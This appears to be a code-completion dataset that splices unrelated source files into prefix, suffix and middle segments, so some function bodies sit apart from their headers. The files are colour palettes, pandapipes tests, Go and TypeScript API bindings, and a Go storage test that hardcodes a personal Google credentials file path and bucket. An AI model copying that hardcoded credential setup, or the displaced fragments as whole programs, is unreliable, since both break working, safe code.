8: ["#d73027","#f46d43","#fdae61","#fee08b","#d9ef8b","#a6d96a","#66bd63","#1a9850"],
9: ["#d73027","#f46d43","#fdae61","#fee08b","#ffffbf","#d9ef8b","#a6d96a","#66bd63","#1a9850"],
10: ["#a50026","#d73027","#f46d43","#fdae61","#fee08b","#d9ef8b","#a6d96a","#66bd63","#1a9850","#006837"],
11: ["#a50026","#d73027","#f46d43","#fdae61","#fee08b","#ffffbf","#d9ef8b","#a6d96a","#66bd63","#1a9850","#006837"]
},Accent: {
3: ["#7fc97f","#beaed4","#fdc086"],
4: ["#7fc97f","#beaed4","#fdc086","#ffff99"],
5: ["#7fc97f","#beaed4","#fdc086","#ffff99","#386cb0"],
6: ["#7fc97f","#beaed4","#fdc086","#ffff99","#386cb0","#f0027f"],
7: ["#7fc97f","#beaed4","#fdc086","#ffff99","#386cb0","#f0027f","#bf5b17"],
8: ["#7fc97f","#beaed4","#fdc086","#ffff99","#386cb0","#f0027f","#bf5b17","#666666"]
},Dark2: {
3: ["#1b9e77","#d95f02","#7570b3"],
4: ["#1b9e77","#d95f02","#7570b3","#e7298a"],
5: ["#1b9e77","#d95f02","#7570b3","#e7298a","#66a61e"],
6: ["#1b9e77","#d95f02","#7570b3","#e7298a","#66a61e","#e6ab02"],
7: ["#1b9e77","#d95f02","#7570b3","#e7298a","#66a61e","#e6ab02","#a6761d"],
8: ["#1b9e77","#d95f02","#7570b3","#e7298a","#66a61e","#e6ab02","#a6761d","#666666"]
},Paired: {
3: ["#a6cee3","#1f78b4","#b2df8a"],
4: ["#a6cee3","#1f78b4","#b2df8a","#33a02c"],
5: ["#a6cee3","#1f78b4","#b2df8a","#33a02c","#fb9a99"],
6: ["#a6cee3","#1f78b4","#b2df8a","#33a02c","#fb9a99","#e31a1c"],
7: ["#a6cee3","#1f78b4","#b2df8a","#33a02c","#fb9a99","#e31a1c","#fdbf6f"],
8: ["#a6cee3","#1f78b4","#b2df8a","#33a02c","#fb9a99","#e31a1c","#fdbf6f","#ff7f00"],
9: ["#a6cee3","#1f78b4","#b2df8a","#33a02c","#fb9a99","#e31a1c","#fdbf6f","#ff7f00","#cab2d6"],
10: ["#a6cee3","#1f78b4","#b2df8a","#33a02c","#fb9a99","#e31a1c","#fdbf6f","#ff7f00","#cab2d6","#6a3d9a"],
11: ["#a6cee3","#1f78b4","#b2df8a","#33a02c","#fb9a99","#e31a1c","#fdbf6f","#ff7f00","#cab2d6","#6a3d9a","#ffff99"],
12: ["#a6cee3","#1f78b4","#b2df8a","#33a02c","#fb9a99","#e31a1c","#fdbf6f","#ff7f00","#cab2d6","#6a3d9a","#ffff99","#b15928"]
},Pastel1: {
3: ["#fbb4ae","#b3cde3","#ccebc5"],
4: ["#fbb4ae","#b3cde3","#ccebc5","#decbe4"],
5: ["#fbb4ae","#b3cde3","#ccebc5","#decbe4","#fed9a6"],
6: ["#fbb4ae","#b3cde3","#ccebc5","#decbe4","#fed9a6","#ffffcc"],
7: ["#fbb4ae","#b3cde3","#ccebc5","#decbe4","#fed9a6","#ffffcc","#e5d8bd"],
8: ["#fbb4ae","#b3cde3","#ccebc5","#decbe4","#fed9a6","#ffffcc","#e5d8bd","#fddaec"],
9: ["#fbb4ae","#b3cde3","#ccebc5","#decbe4","#fed9a6","#ffffcc","#e5d8bd","#fddaec","#f2f2f2"]
},Pastel2: {
3: ["#b3e2cd","#fdcdac","#cbd5e8"],
4: ["#b3e2cd","#fdcdac","#cbd5e8","#f4cae4"],
5: ["#b3e2cd","#fdcdac","#cbd5e8","#f4cae4","#e6f5c9"],
6: ["#b3e2cd","#fdcdac","#cbd5e8","#f4cae4","#e6f5c9","#fff2ae"],
7: ["#b3e2cd","#fdcdac","#cbd5e8","#f4cae4","#e6f5c9","#fff2ae","#f1e2cc"],
8: ["#b3e2cd","#fdcdac","#cbd5e8","#f4cae4","#e6f5c9","#fff2ae","#f1e2cc","#cccccc"]
},Set1: {
3: ["#e41a1c","#377eb8","#4daf4a"],
4: ["#e41a1c","#377eb8","#4daf4a","#984ea3"],
5: ["#e41a1c","#377eb8","#4daf4a","#984ea3","#ff7f00"],
6: ["#e41a1c","#377eb8","#4daf4a","#984ea3","#ff7f00","#ffff33"],
7: ["#e41a1c","#377eb8","#4daf4a","#984ea3","#ff7f00","#ffff33","#a65628"],
8: ["#e41a1c","#377eb8","#4daf4a","#984ea3","#ff7f00","#ffff33","#a65628","#f781bf"],
9: ["#e41a1c","#377eb8","#4daf4a","#984ea3","#ff7f00","#ffff33","#a65628","#f781bf","#999999"]
},Set2: {
3: ["#66c2a5","#fc8d62","#8da0cb"],
4: ["#66c2a5","#fc8d62","#8da0cb","#e78ac3"],
5: ["#66c2a5","#fc8d62","#8da0cb","#e78ac3","#a6d854"],
6: ["#66c2a5","#fc8d62","#8da0cb","#e78ac3","#a6d854","#ffd92f"],
7: ["#66c2a5","#fc8d62","#8da0cb","#e78ac3","#a6d854","#ffd92f","#e5c494"],
8: ["#66c2a5","#fc8d62","#8da0cb","#e78ac3","#a6d854","#ffd92f","#e5c494","#b3b3b3"]
},Set3: {
3: ["#8dd3c7","#ffffb3","#bebada"],
4: ["#8dd3c7","#ffffb3","#bebada","#fb8072"],
5: ["#8dd3c7","#ffffb3","#bebada","#fb8072","#80b1d3"],
6: ["#8dd3c7","#ffffb3","#bebada","#fb8072","#80b1d3","#fdb462"],
7: ["#8dd3c7","#ffffb3","#bebada","#fb8072","#80b1d3","#fdb462","#b3de69"],
8: ["#8dd3c7","#ffffb3","#bebada","#fb8072","#80b1d3","#fdb462","#b3de69","#fccde5"],
9: ["#8dd3c7","#ffffb3","#bebada","#fb8072","#80b1d3","#fdb462","#b3de69","#fccde5","#d9d9d9"],
10: ["#8dd3c7","#ffffb3","#bebada","#fb8072","#80b1d3","#fdb462","#b3de69","#fccde5","#d9d9d9","#bc80bd"],
11: ["#8dd3c7","#ffffb3","#bebada","#fb8072","#80b1d3","#fdb462","#b3de69","#fccde5","#d9d9d9","#bc80bd","#ccebc5"],
12: ["#8dd3c7","#ffffb3","#bebada","#fb8072","#80b1d3","#fdb462","#b3de69","#fccde5","#d9d9d9","#bc80bd","#ccebc5","#ffed6f"]
}}; | 6: ["#fee5d9","#fcbba1","#fc9272","#fb6a4a","#de2d26","#a50f15"],
7: ["#fee5d9","#fcbba1","#fc9272","#fb6a4a","#ef3b2c","#cb181d","#99000d"], |
test_file_io.py | # Copyright (c) 2020 by Fraunhofer Institute for Energy Economics
# and Energy System Technology (IEE), Kassel. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be found in the LICENSE file.
import os
import pandapipes
import pytest
from pandapower.test.toolbox import tempdir
from pandas.testing import assert_frame_equal
# @pytest.fixture()
def load_net():
# create test network
net = pandapipes.create_empty_network("test_net", fluid="lgas")
j1 = pandapipes.create_junction(net, pn_bar=1.05, tfluid_k=293.15,
name="Connection to External Grid", geodata=(0, 0))
j2 = pandapipes.create_junction(net, pn_bar=1.05, tfluid_k=293.15, name="Junction 2",
geodata=(2, 0))
j3 = pandapipes.create_junction(net, pn_bar=1.05, tfluid_k=293.15, name="Junction 3",
geodata=(7, 4))
j4 = pandapipes.create_junction(net, pn_bar=1.05, tfluid_k=293.15, name="Junction 4",
geodata=(7, -4))
j5 = pandapipes.create_junction(net, pn_bar=1.05, tfluid_k=293.15, name="Junction 5",
geodata=(5, 3))
j6 = pandapipes.create_junction(net, pn_bar=1.05, tfluid_k=293.15, name="Junction 6",
geodata=(5, -3))
pandapipes.create_ext_grid(net, junction=j1, p_bar=1.1, t_k=293.15, name="Grid Connection")
pandapipes.create_pipe_from_parameters(net, from_junction=j1, to_junction=j2, length_km=10,
diameter_m=0.05, name="Pipe 1", geodata=[(0, 0), (2, 0)])
pandapipes.create_pipe_from_parameters(net, from_junction=j2, to_junction=j3, length_km=2,
diameter_m=0.05, name="Pipe 2",
geodata=[(2, 0), (2, 4), (7, 4)])
pandapipes.create_pipe_from_parameters(net, from_junction=j2, to_junction=j4, length_km=2.5,
diameter_m=0.05, name="Pipe 3",
geodata=[(2, 0), (2, -4), (7, -4)])
pandapipes.create_pipe_from_parameters(net, from_junction=j3, to_junction=j5, length_km=1,
diameter_m=0.05, name="Pipe 4",
geodata=[(7, 4), (7, 3), (5, 3)])
pandapipes.create_pipe_from_parameters(net, from_junction=j4, to_junction=j6, length_km=1,
diameter_m=0.05, name="Pipe 5",
geodata=[(7, -4), (7, -3), (5, -3)])
pandapipes.create_valve(net, from_junction=j5, to_junction=j6, diameter_m=0.05,
opened=True)
pandapipes.create_sink(net, junction=j4, mdot_kg_per_s=5.45e-5, name="Sink 1")
pandapipes.create_source(net, junction=j3, mdot_kg_per_s=3.45e-5)
return net
def test_pickle(tempdir):
"""
Checks if a network saved and reloaded as a pickle file is identical.
"""
net = load_net()
filename = os.path.join(tempdir, "test_net_1.p")
# save test network
pandapipes.to_pickle(net, filename)
# load test network
net2 = pandapipes.from_pickle(filename)
# check if saved and loaded versions are identical
assert pandapipes.nets_equal(net, net2), "Error in comparison after saving to Pickle."
def test_json(tempdir):
|
def test_json_string():
"""
Checks if a network saved and reloaded as a json string is identical.
"""
net = load_net()
# save test network
json_string = pandapipes.to_json(net)
# load test network
net2 = pandapipes.from_json_string(json_string)
# check if saved and loaded versions are identical
assert_frame_equal(net.pipe_geodata, net2.pipe_geodata)
del net.pipe_geodata
del net2.pipe_geodata
assert pandapipes.nets_equal(net, net2),\
"Error in comparison after saving to JSON string."
if __name__ == '__main__':
pytest.main(["test_file_io.py"])
| """
Checks if a network saved and reloaded as a json file is identical.
"""
net = load_net()
filename = os.path.join(tempdir, "test_net_1.json")
# save test network
pandapipes.to_json(net, filename)
# load test network
net2 = pandapipes.from_json(filename)
# check if saved and loaded versions are identical
assert_frame_equal(net.pipe_geodata, net2.pipe_geodata)
del net.pipe_geodata
del net2.pipe_geodata
assert pandapipes.nets_equal(net, net2), "Error in comparison after saving to JSON." |
model_asset_details.go | /*
* Godot Asset Library
*
* Godot Engine's asset library
*
* API version: 1.0.0
* Generated by: Swagger Codegen (https://github.com/swagger-api/swagger-codegen.git)
*/
package swagger
// A resource provided by the asset library (add-on, project, ...).<br> These properties are only returned when requesting a specific asset, not a list of assets.
type AssetDetails struct {
// The asset's unique identifier.
AssetId string `json:"asset_id,omitempty"`
// The asset's type, can be \"addon\" or \"project\".
Type_ string `json:"type,omitempty"`
// The author's username.
Author string `json:"author,omitempty"`
// The author's unique identifier.
AuthorId string `json:"author_id,omitempty"`
// The category the asset belongs to.
Category string `json:"category,omitempty"` | CategoryId string `json:"category_id,omitempty"`
DownloadProvider string `json:"download_provider,omitempty"`
DownloadCommit string `json:"download_commit,omitempty"`
// The asset's SHA-256 hash for the latest version. **Note:** This is currently always an empty string as asset versions' hashes aren't computed and stored yet.
DownloadHash string `json:"download_hash,omitempty"`
// The asset's license as a [SPDX license identifier](https://spdx.org/licenses/). For compatibility reasons, this field is called `cost` instead of `license`.
Cost string `json:"cost,omitempty"`
// The Godot version the asset's latest version is intended for (in `major.minor` format).<br> This field is present for compatibility reasons with the Godot editor. See also the `versions` array.
GodotVersion string `json:"godot_version,omitempty"`
// The asset's icon URL (should always be a PNG image).
IconUrl string `json:"icon_url,omitempty"`
// If `true`, the asset is marked as archived by its author. When archived, it can't receive any further reviews but can still be unarchived at any time by the author.
IsArchived bool `json:"is_archived,omitempty"`
// The asset's issue reporting URL (typically associated with the Git repository specified in `browse_url`).
IssuesUrl string `json:"issues_url,omitempty"`
// The date on which the asset entry was last updated. Note that entries can be edited independently of new asset versions being released.
ModifyDate string `json:"modify_date,omitempty"`
// The asset's rating (unused). For compatibility reasons, a value of 0 is always returned. You most likely want `score` instead.
Rating string `json:"rating,omitempty"`
// The asset's support level.
SupportLevel string `json:"support_level,omitempty"`
// The asset's title (usually less than 50 characters).
Title string `json:"title,omitempty"`
// The asset revision string (starting from 1).<br> Every time the asset is edited (for anyone and for any reason), this string is incremented by 1.
Version string `json:"version,omitempty"`
// The version string of the latest version (free-form, but usually `major.minor` or `major.minor.patch`).<br> This field is present for compatibility reasons with the Godot editor. See also the `versions` array.
VersionString string `json:"version_string,omitempty"`
Searchable string `json:"searchable,omitempty"`
Previews []AssetPreview `json:"previews,omitempty"`
// The asset's browsable repository URL.
BrowseUrl string `json:"browse_url,omitempty"`
// The asset's full description.
Description string `json:"description,omitempty"`
// The download link of the asset's latest version (should always point to a ZIP archive).<br> This field is present for compatibility reasons with the Godot editor. See also the `versions` array.
DownloadUrl string `json:"download_url,omitempty"`
} | // The unique identifier of the category the asset belongs to. |
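A sketch of fetching these fields from the asset library's single-asset endpoint; the URL pattern and the asset ID are assumptions, while the keys follow the json tags declared above:
import requests

# Assumed endpoint pattern for one asset; 123 is a placeholder ID.
url = "https://godotengine.org/asset-library/api/asset/123"
asset = requests.get(url, timeout=10).json()

# Keys mirror the json tags on AssetDetails (cost holds the SPDX license).
print(asset["title"], asset["cost"], asset["godot_version"])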
integration_test.go | package storage
import (
"os"
"io"
. "bytes"
"testing"
"fmt"
"strings"
)
const (
TEST_DIR = "test_dir"
STORAGE_BACKEND = "GCS"
TEST_CHUNKSIZE = int64(16 * 1024 * 1024) // 16 MB
)
func setEnv() |
func TestMain(m *testing.M) {
setEnv()
exit := m.Run()
os.Exit(exit)
}
func Test_ObjectWrite(t *testing.T) {
objects, err := NewObjectAPI(TEST_DIR, 0, STORAGE_BACKEND)
if err != nil {
t.Fatalf("failed to create object API: %v", err)
}
file_path, csum, bwrt, err := objects.CreateObject("objects", strings.NewReader("Hello"), false)
fmt.Println("file_path, checksum, bytes: ", file_path, csum, bwrt)
if err != nil {
fmt.Println("error put object: \n", err)
}
fmt.Println("Sent object. Bytes written:", file_path, bwrt)
b := objects.CheckObject(file_path)
if !b {
t.Fatalf("Unexpected error in creation of object in CreateObject()")
}
fmt.Println("Deleting object:", file_path)
err = objects.DeleteObject(file_path)
if err != nil {
fmt.Println("Failed to delete object from server:", err)
t.Fatalf("Failed to delete object from server")
}
}
/*
func Test_ReadObject(t *testing.T) {
var data Buffer
api, err:= NewObjectAPI(TEST_DIR, 0, STORAGE_BACKEND)
file_path, _, _, err := api.PutObject("objects", strings.NewReader("Hello"), false)
if err != nil {
fmt.Println("error in put object: \n", err)
t.Fatalf("Failed to write file on server for reading")
}
_, err = api.ReadObject(file_path, &data)
if err != nil {
fmt.Println("Read object failed", err)
}
fmt.Println("size of data:", data.Len())
fmt.Println("data:", &data)
}*/
func putTestFile(api ObjectAPIServer) (string, error) {
file_path, _, _, err := api.CreateObject("objects", strings.NewReader("Hello World. Testing text files. Short files."), false)
if err != nil {
fmt.Println("error in put object: \n", err)
return "", err
}
return file_path, err
}
func Test_ReadObjectInChunks(t *testing.T) {
var data Buffer
var file_path string
api, err := NewObjectAPI(TEST_DIR, 0, STORAGE_BACKEND)
var size uint64
var offset uint64
var n int64
file_path, err = putTestFile(api)
offset = 0
size = 1
var block_size uint64 = 1
for {
n, err = api.ReadObject(file_path, int64(offset), int64(size), &data)
if err == io.EOF {
break
}
offset = offset + block_size
}
var byt byte // zero-valued delimiter: ReadString returns io.EOF plus all buffered data when it is absent
str, err := data.ReadString(byt)
fmt.Println("data: ", str)
fmt.Println("size read:", n)
if err != nil && err != io.EOF {
t.Fatalf("Error occurred during seek %d %d", offset, size)
}
}
| {
os.Setenv("GOOGLE_APPLICATION_CREDENTIALS", "/Users/apple/MyProjects/creds/hw-storage-75d060e8419a.json")
os.Setenv("GOOGLE_STORAGE_BUCKET", "hyperflow001")
} |
demoEvery.js | const myArr = [1, 15, 23, 6, 42]; | const isBelow = (x) => x < 45;
console.log(myArr.every(isBelow)); // true: every element of myArr is below 45
|
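For comparison, the same check in Python uses all(), which mirrors Array.prototype.every:
# Python analogue of myArr.every(isBelow) above.
my_arr = [1, 15, 23, 6, 42]
print(all(x < 45 for x in my_arr))  # True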
v1.ts | // Copyright 2020 Google LLC
// Licensed under the Apache License, Version 2.0 (the "License");
// you may not use this file except in compliance with the License.
// You may obtain a copy of the License at
//
// http://www.apache.org/licenses/LICENSE-2.0
//
// Unless required by applicable law or agreed to in writing, software
// distributed under the License is distributed on an "AS IS" BASIS,
// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
// See the License for the specific language governing permissions and
// limitations under the License.
/* eslint-disable @typescript-eslint/no-explicit-any */
/* eslint-disable @typescript-eslint/class-name-casing */
/* eslint-disable @typescript-eslint/no-unused-vars */
/* eslint-disable @typescript-eslint/no-empty-interface */
/* eslint-disable @typescript-eslint/no-namespace */
/* eslint-disable no-irregular-whitespace */
import {
OAuth2Client,
JWT,
Compute,
UserRefreshClient,
BaseExternalAccountClient,
GaxiosPromise,
GoogleConfigurable,
createAPIRequest,
MethodOptions,
StreamMethodOptions,
GlobalOptions,
GoogleAuth,
BodyResponseCallback,
APIRequestContext,
} from 'googleapis-common';
import {Readable} from 'stream';
export namespace searchconsole_v1 {
export interface Options extends GlobalOptions {
version: 'v1';
}
interface StandardParameters {
/**
* Auth client or API Key for the request
*/
auth?:
| string
| OAuth2Client
| JWT
| Compute
| UserRefreshClient
| BaseExternalAccountClient
| GoogleAuth;
/**
* V1 error format.
*/
'$.xgafv'?: string;
/**
* OAuth access token.
*/
access_token?: string;
/**
* Data format for response.
*/
alt?: string;
/**
* JSONP
*/
callback?: string;
/**
* Selector specifying which fields to include in a partial response.
*/
fields?: string;
/**
* API key. Your API key identifies your project and provides you with API access, quota, and reports. Required unless you provide an OAuth 2.0 token.
*/
key?: string;
/**
* OAuth 2.0 token for the current user.
*/
oauth_token?: string;
/**
* Returns response with indentations and line breaks.
*/
prettyPrint?: boolean;
/**
* Available to use for quota purposes for server-side applications. Can be any arbitrary string assigned to a user, but should not exceed 40 characters.
*/
quotaUser?: string;
/**
* Legacy upload protocol for media (e.g. "media", "multipart").
*/
uploadType?: string;
/**
* Upload protocol for media (e.g. "raw", "multipart").
*/
upload_protocol?: string;
}
/**
* Google Search Console API
*
* The Search Console API provides access to both Search Console data (verified users only) and to public information on a URL basis (anyone)
*
* @example
* ```js
* const {google} = require('googleapis');
* const searchconsole = google.searchconsole('v1');
* ```
*/
export class Searchconsole {
context: APIRequestContext;
searchanalytics: Resource$Searchanalytics;
sitemaps: Resource$Sitemaps;
sites: Resource$Sites;
urlTestingTools: Resource$Urltestingtools;
constructor(options: GlobalOptions, google?: GoogleConfigurable) {
this.context = {
_options: options || {},
google,
};
this.searchanalytics = new Resource$Searchanalytics(this.context);
this.sitemaps = new Resource$Sitemaps(this.context);
this.sites = new Resource$Sites(this.context);
this.urlTestingTools = new Resource$Urltestingtools(this.context);
}
}
export interface Schema$ApiDataRow {
clicks?: number | null;
ctr?: number | null;
impressions?: number | null;
keys?: string[] | null;
position?: number | null;
}
/**
* A filter test to be applied to each row in the data set, where a match can return the row. Filters are string comparisons, and values and dimension names are not case-sensitive. Individual filters are either AND'ed or OR'ed within their parent filter group, according to the group's group type. You do not need to group by a specified dimension to filter against it.
*/
export interface Schema$ApiDimensionFilter {
dimension?: string | null;
expression?: string | null;
operator?: string | null;
}
/**
* A set of dimension value filters to test against each row. Only rows that pass all filter groups will be returned. All results within a filter group are either AND'ed or OR'ed together, depending on the group type selected. All filter groups are AND'ed together.
*/
export interface Schema$ApiDimensionFilterGroup {
filters?: Schema$ApiDimensionFilter[];
groupType?: string | null;
}
/**
* Blocked resource.
*/
export interface Schema$BlockedResource {
/**
* URL of the blocked resource.
*/
url?: string | null;
}
/**
* Describe image data.
*/
export interface Schema$Image {
/**
* Image data in format determined by the mime type. Currently, the format will always be "image/png", but this might change in the future.
*/
data?: string | null;
/**
* The mime-type of the image data.
*/
mimeType?: string | null;
}
/**
* Mobile-friendly issue.
*/
export interface Schema$MobileFriendlyIssue {
/**
* Rule violated.
*/
rule?: string | null;
}
/**
* Information about a resource with issue.
*/
export interface Schema$ResourceIssue {
/**
* Describes a blocked resource issue.
*/
blockedResource?: Schema$BlockedResource;
}
/**
* Mobile-friendly test request.
*/
export interface Schema$RunMobileFriendlyTestRequest {
/**
* Whether or not screenshot is requested. Default is false.
*/
requestScreenshot?: boolean | null;
/**
* URL for inspection.
*/
url?: string | null;
}
/**
* Mobile-friendly test response, including mobile-friendly issues and resource issues.
*/
export interface Schema$RunMobileFriendlyTestResponse {
/**
* Test verdict, whether the page is mobile friendly or not.
*/
mobileFriendliness?: string | null;
/**
* List of mobile-usability issues.
*/
mobileFriendlyIssues?: Schema$MobileFriendlyIssue[];
/**
* Information about embedded resources issues.
*/
resourceIssues?: Schema$ResourceIssue[];
/**
* Screenshot of the requested URL.
*/
screenshot?: Schema$Image;
/**
* Final state of the test, can be either complete or an error.
*/
testStatus?: Schema$TestStatus;
}
export interface Schema$SearchAnalyticsQueryRequest {
/**
* [Optional; Default is \"auto\"] How data is aggregated. If aggregated by property, all data for the same property is aggregated; if aggregated by page, all data is aggregated by canonical URI. If you filter or group by page, choose AUTO; otherwise you can aggregate either by property or by page, depending on how you want your data calculated; see the help documentation to learn how data is calculated differently by site versus by page. **Note:** If you group or filter by page, you cannot aggregate by property. If you specify any value other than AUTO, the aggregation type in the result will match the requested type, or if you request an invalid type, you will get an error. The API will never change your aggregation type if the requested type is invalid.
*/
aggregationType?: string | null;
/**
* The data state to be fetched; it can be full or all, the latter including both full and partial data.
*/
dataState?: string | null;
/**
* [Optional] Zero or more filters to apply to the dimension grouping values; for example, 'query contains \"buy\"' to see only data where the query string contains the substring \"buy\" (not case-sensitive). You can filter by a dimension without grouping by it.
*/
dimensionFilterGroups?: Schema$ApiDimensionFilterGroup[];
/**
* [Optional] Zero or more dimensions to group results by. Dimensions are the group-by values in the Search Analytics page. Dimensions are combined to create a unique row key for each row. Results are grouped in the order that you supply these dimensions.
*/
dimensions?: string[] | null;
/**
* [Required] End date of the requested date range, in YYYY-MM-DD format, in PST (UTC - 8:00). Must be greater than or equal to the start date. This value is included in the range.
*/
endDate?: string | null;
/**
* [Optional; Default is 1000] The maximum number of rows to return. Must be a number from 1 to 25,000 (inclusive).
*/
rowLimit?: number | null;
/**
* [Optional; Default is \"web\"] The search type to filter for.
*/
searchType?: string | null;
/**
* [Required] Start date of the requested date range, in YYYY-MM-DD format, in PST time (UTC - 8:00). Must be less than or equal to the end date. This value is included in the range.
*/
startDate?: string | null;
/**
* [Optional; Default is 0] Zero-based index of the first row in the response. Must be a non-negative number.
*/
startRow?: number | null;
}
/**
* A list of rows, one per result, grouped by key. Metrics in each row are aggregated for all data grouped by that key either by page or property, as specified by the aggregation type parameter.
*/
export interface Schema$SearchAnalyticsQueryResponse {
/**
* How the results were aggregated.
*/
responseAggregationType?: string | null;
/**
* A list of rows grouped by the key values in the order given in the query.
*/
rows?: Schema$ApiDataRow[];
}
/**
* List of sitemaps.
*/
export interface Schema$SitemapsListResponse {
/**
* Contains detailed information about a specific URL submitted as a [sitemap](https://support.google.com/webmasters/answer/156184).
*/
sitemap?: Schema$WmxSitemap[];
}
/**
* List of sites with access level information.
*/
export interface Schema$SitesListResponse {
/**
* Contains permission level information about a Search Console site. For more information, see [Permissions in Search Console](https://support.google.com/webmasters/answer/2451999).
*/
siteEntry?: Schema$WmxSite[];
}
/**
* Final state of the test, including error details if necessary.
*/
export interface Schema$TestStatus {
/**
* Error details if applicable.
*/
details?: string | null;
/**
* Status of the test.
*/
status?: string | null;
}
/**
* Contains permission level information about a Search Console site. For more information, see [Permissions in Search Console](https://support.google.com/webmasters/answer/2451999).
*/
export interface Schema$WmxSite {
/**
* The user's permission level for the site.
*/
permissionLevel?: string | null;
/**
* The URL of the site.
*/
siteUrl?: string | null;
}
/**
* Contains detailed information about a specific URL submitted as a [sitemap](https://support.google.com/webmasters/answer/156184).
*/
export interface Schema$WmxSitemap {
/**
* The various content types in the sitemap.
*/
contents?: Schema$WmxSitemapContent[];
/**
* Number of errors in the sitemap. These are issues with the sitemap itself that need to be fixed before it can be processed correctly.
*/
errors?: string | null;
/**
* If true, the sitemap has not been processed.
*/
isPending?: boolean | null;
/**
* If true, the sitemap is a collection of sitemaps.
*/
isSitemapsIndex?: boolean | null;
/**
* Date & time in which this sitemap was last downloaded. Date format is in RFC 3339 format (yyyy-mm-dd).
*/
lastDownloaded?: string | null;
/**
* Date & time in which this sitemap was submitted. Date format is in RFC 3339 format (yyyy-mm-dd).
*/
lastSubmitted?: string | null;
/**
* The url of the sitemap.
*/
path?: string | null;
/**
* The type of the sitemap. For example: `rssFeed`.
*/
type?: string | null;
/**
* Number of warnings for the sitemap. These are generally non-critical issues with URLs in the sitemaps.
*/
warnings?: string | null;
}
/**
* Information about the various content types in the sitemap.
*/
export interface Schema$WmxSitemapContent {
/**
* *Deprecated; do not use.*
*/
indexed?: string | null;
/**
* The number of URLs in the sitemap (of the content type).
*/
submitted?: string | null;
/**
* The specific type of content in this sitemap. For example: `web`.
*/
type?: string | null;
}
export class Resource$Searchanalytics {
context: APIRequestContext;
constructor(context: APIRequestContext) {
this.context = context;
}
/**
* Query your data with filters and parameters that you define. Returns zero or more rows grouped by the row keys that you define. You must define a date range of one or more days. When date is one of the group by values, any days without data are omitted from the result list. If you need to know which days have data, issue a broad date range query grouped by date for any metric, and see which day rows are returned.
* @example
* ```js
* // Before running the sample:
* // - Enable the API at:
* // https://console.developers.google.com/apis/api/searchconsole.googleapis.com
* // - Log in to gcloud by running:
* // `$ gcloud auth application-default login`
* // - Install the npm module by running:
* // `$ npm install googleapis`
*
* const {google} = require('googleapis');
* const searchconsole = google.searchconsole('v1');
*
* async function main() {
* const auth = new google.auth.GoogleAuth({
* // Scopes can be specified either as an array or as a single, space-delimited string.
* scopes: [
* 'https://www.googleapis.com/auth/webmasters',
* 'https://www.googleapis.com/auth/webmasters.readonly',
* ],
* });
*
* // Acquire an auth client, and bind it to all future calls
* const authClient = await auth.getClient();
* google.options({auth: authClient});
*
* // Do the magic
* const res = await searchconsole.searchanalytics.query({
* // The site's URL, including protocol. For example: `http://www.example.com/`.
* siteUrl: 'placeholder-value',
*
* // Request body metadata
* requestBody: {
* // request body parameters
* // {
* // "aggregationType": "my_aggregationType",
* // "dataState": "my_dataState",
* // "dimensionFilterGroups": [],
* // "dimensions": [],
* // "endDate": "my_endDate",
* // "rowLimit": 0,
* // "searchType": "my_searchType",
* // "startDate": "my_startDate",
* // "startRow": 0
* // }
* },
* });
* console.log(res.data);
*
* // Example response
* // {
* // "responseAggregationType": "my_responseAggregationType",
* // "rows": []
* // }
* }
*
* main().catch(e => {
* console.error(e);
* throw e;
* });
*
* ```
*
* @param params - Parameters for request
* @param options - Optionally override request options, such as `url`, `method`, and `encoding`.
* @param callback - Optional callback that handles the response.
* @returns A promise if used with async/await, or void if used with a callback.
*/
query(
params: Params$Resource$Searchanalytics$Query,
options: StreamMethodOptions
): GaxiosPromise<Readable>;
query(
params?: Params$Resource$Searchanalytics$Query,
options?: MethodOptions
): GaxiosPromise<Schema$SearchAnalyticsQueryResponse>;
query(
params: Params$Resource$Searchanalytics$Query,
options: StreamMethodOptions | BodyResponseCallback<Readable>,
callback: BodyResponseCallback<Readable>
): void;
query(
params: Params$Resource$Searchanalytics$Query,
options:
| MethodOptions
| BodyResponseCallback<Schema$SearchAnalyticsQueryResponse>,
callback: BodyResponseCallback<Schema$SearchAnalyticsQueryResponse>
): void;
query(
params: Params$Resource$Searchanalytics$Query,
callback: BodyResponseCallback<Schema$SearchAnalyticsQueryResponse>
): void;
query(
callback: BodyResponseCallback<Schema$SearchAnalyticsQueryResponse>
): void;
query(
paramsOrCallback?:
| Params$Resource$Searchanalytics$Query
| BodyResponseCallback<Schema$SearchAnalyticsQueryResponse>
| BodyResponseCallback<Readable>,
optionsOrCallback?:
| MethodOptions
| StreamMethodOptions
| BodyResponseCallback<Schema$SearchAnalyticsQueryResponse>
| BodyResponseCallback<Readable>,
callback?:
| BodyResponseCallback<Schema$SearchAnalyticsQueryResponse>
| BodyResponseCallback<Readable>
):
| void
| GaxiosPromise<Schema$SearchAnalyticsQueryResponse>
| GaxiosPromise<Readable> {
let params = (paramsOrCallback ||
{}) as Params$Resource$Searchanalytics$Query;
let options = (optionsOrCallback || {}) as MethodOptions;
if (typeof paramsOrCallback === 'function') {
callback = paramsOrCallback;
params = {} as Params$Resource$Searchanalytics$Query;
options = {};
}
if (typeof optionsOrCallback === 'function') {
callback = optionsOrCallback;
options = {};
}
const rootUrl =
options.rootUrl || 'https://searchconsole.googleapis.com/';
const parameters = {
options: Object.assign(
{
url: (
rootUrl + '/webmasters/v3/sites/{siteUrl}/searchAnalytics/query'
).replace(/([^:]\/)\/+/g, '$1'),
method: 'POST',
},
options
),
params,
requiredParams: ['siteUrl'],
pathParams: ['siteUrl'],
context: this.context,
};
if (callback) {
createAPIRequest<Schema$SearchAnalyticsQueryResponse>(
parameters,
callback as BodyResponseCallback<unknown>
);
} else {
return createAPIRequest<Schema$SearchAnalyticsQueryResponse>(
parameters
);
}
}
}
export interface Params$Resource$Searchanalytics$Query
extends StandardParameters {
/**
* The site's URL, including protocol. For example: `http://www.example.com/`.
*/
siteUrl?: string;
/**
* Request body metadata
*/
requestBody?: Schema$SearchAnalyticsQueryRequest;
}
export class Resource$Sitemaps {
context: APIRequestContext;
constructor(context: APIRequestContext) {
this.context = context;
}
/**
* Deletes a sitemap from this site.
* @example
* ```js
* // Before running the sample:
* // - Enable the API at:
* // https://console.developers.google.com/apis/api/searchconsole.googleapis.com
* // - Log in to gcloud by running:
* // `$ gcloud auth application-default login`
* // - Install the npm module by running:
* // `$ npm install googleapis`
*
* const {google} = require('googleapis');
* const searchconsole = google.searchconsole('v1');
*
* async function main() {
* const auth = new google.auth.GoogleAuth({
* // Scopes can be specified either as an array or as a single, space-delimited string.
